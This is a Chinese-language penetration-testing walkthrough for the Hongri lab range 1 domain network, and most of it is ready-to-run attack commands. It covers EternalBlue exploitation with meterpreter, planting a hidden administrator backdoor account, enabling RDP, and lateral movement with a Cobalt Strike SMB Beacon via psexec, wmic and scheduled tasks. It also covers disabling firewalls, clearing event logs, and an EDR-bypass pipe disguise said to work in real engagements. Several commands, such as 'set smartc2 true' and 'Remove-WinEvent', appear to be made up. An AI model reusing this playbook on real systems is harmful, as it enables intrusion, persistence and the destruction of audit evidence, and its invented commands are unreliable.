红日靶场1 内网横向渗透:MS17-010与SMB Beacon 3种攻击路径实测
红日靶场1内网横向渗透实战MS17-010与SMB Beacon攻击路径深度解析靶场环境与攻击面分析红日靶场1构建了一个典型的企业内网域环境包含三台核心主机Win7边界服务器双网卡、Win2003域成员和Win2008域控服务器。网络拓扑呈现以下特征边界服务器Win7配置双网卡NAT仅主机模式运行PHPStudy提供Web服务成为内外网通信枢纽内网域环境采用52.0/24网段域控固定IP为192.168.52.138域成员为192.168.52.141初始凭证所有系统默认密码为hongrisec2019需注意部分系统会强制要求修改攻击路径通常遵循外网突破→内网渗透→横向移动→权限维持的流程。本文将重点剖析获取边界服务器控制权后的内网横向渗透阶段特别是MS17-010漏洞利用与SMB Beacon的三种实战应用。内网信息收集方法论在获得Win7边界服务器的控制权后需系统性地收集内网信息# 基础网络信息收集 ipconfig /all # 确认内网网段和DNS服务器 netstat -ano # 查看活跃连接 route print # 路由表分析 # 域环境探测 net view /domain # 确认域名称 net time /domain # 定位域控 nltest /domain_trusts # 查询域信任关系 # 主机发现技巧需已添加路由 arp -a # ARP缓存分析 for /L %i in (1,1,254) do ping -n 1 192.168.52.%i | find 回复通过上述命令可确认关键信息域名称god.org域控IP192.168.52.138通常也是DNS服务器存活主机52.138域控、52.141域成员、52.143边界服务器MS17-010漏洞利用实战永恒之蓝漏洞MS17-010是内网横向渗透的利器其利用过程包含以下关键步骤漏洞检测与验证使用Metasploit内置扫描模块进行精准检测use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.138-141 set THREADS 3 run检测结果通常呈现以下特征[] 192.168.52.138:445 - Host is likely VULNERABLE to MS17-010! [] 192.168.52.141:445 - Host is likely VULNERABLE to MS17-010!多模式攻击路径对比路径1直接获取SYSTEM权限Shelluse exploit/windows/smb/ms17_010_eternalblue set RHOST 192.168.52.138 set payload windows/x64/meterpreter/bind_tcp exploit优势直接获取最高权限可立即进行权限维持操作局限部分补丁环境可能导致蓝屏缺乏隐蔽性易触发安全告警路径2创建隐藏用户后门use exploit/windows/smb/ms17_010_command set RHOST 192.168.52.141 set COMMAND net user hacker$ Pssw0rd /add /expires:never net localgroup administrators hacker$ /add exploit适用场景需要持久化访问目标系统存在防火墙拦截meterpreter风险提示需定期更换密码避免被发现建议使用$符号创建隐藏用户路径3启用RDP服务set COMMAND reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall add rule nameRDP dirin actionallow protocolTCP localport3389组合技巧# 端口转发解决NAT问题 netsh interface portproxy add v4tov4 listenport3389 connectaddress192.168.52.141SMB Beacon高级应用Cobalt Strike的SMB Beacon为内网横向渗透提供隐蔽通道其部署流程如下环境准备监听器配置创建SMB类型监听器如smb_beacon设置管道名称默认可修改为\\.\pipe\msagent_%d会话迁移# 在已有meterpreter会话中 migrate -N explorer.exe upload /path/to/beacon.exe C:\\Windows\\Temp shell C:\\Windows\\Temp\\beacon.exe三种攻击模式对比攻击方式实施命令隐蔽性稳定性适用场景PsExec横向移动psexec \\192.168.52.138 smb★★☆★★★域管理员凭证已知WMI远程执行wmic /node:192.168.52.141 process call create beacon.exe★★★★★☆需本地管理员权限计划任务注入schtasks /create /s 192.168.52.138 /tn update /tr beacon.exe /sc hourly★★☆★★★需要持久化控制隐蔽通道维持技巧管道伪装set pipename \\\.\pipe\mssql_%d心跳间隔调整set sleeptime 60000 # 60秒心跳 set jitter 30 # 30%随机偏移流量混淆set obfuscate true set smartc2 true防御规避与痕迹清理防火墙绕过方案# 临时关闭防火墙需管理员权限 netsh advfirewall set allprofiles state off # 精准放行规则更隐蔽 netsh advfirewall firewall add rule nameWindows Update dirin actionallow programC:\Windows\Temp\svchost.exe enableyes日志清理指南基础清理wevtutil cl security # 清除安全日志 wevtutil cl system # 清除系统日志高级技巧# 使用meterpreter的clearev模块 clearev # 或使用PowerShell脚本过滤删除特定事件 Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624} | Remove-WinEvent攻击路径决策树根据实战经验总结的最佳路径选择策略开始 │ ├─ 目标是否开放445端口 │ ├─ 是 → 检测MS17-010漏洞 │ │ ├─ 存在 → 使用永恒之蓝直接获取SYSTEM权限 │ │ └─ 不存在 → 尝试SMB Beacon │ │ ├─ 成功 → 建立隐蔽通道 │ │ └─ 失败 → 尝试PsExec/WMI │ └─ 否 → 检查其他协议135/5985 │ ├─ WMI执行 → 部署Beacon │ └─ WinRM连接 → 上传Payload │ └─ 是否需要持久化 ├─ 是 → 创建计划任务/服务 └─ 否 → 维持当前会话在真实内网渗透测试中曾遇到某次攻击尝试被目标EDR拦截的情况。通过分析发现将SMB Beacon的管道名称改为\\.\pipe\PrintSpooler可成功绕过检测这种伪装成打印服务的技巧在实际环境中非常有效。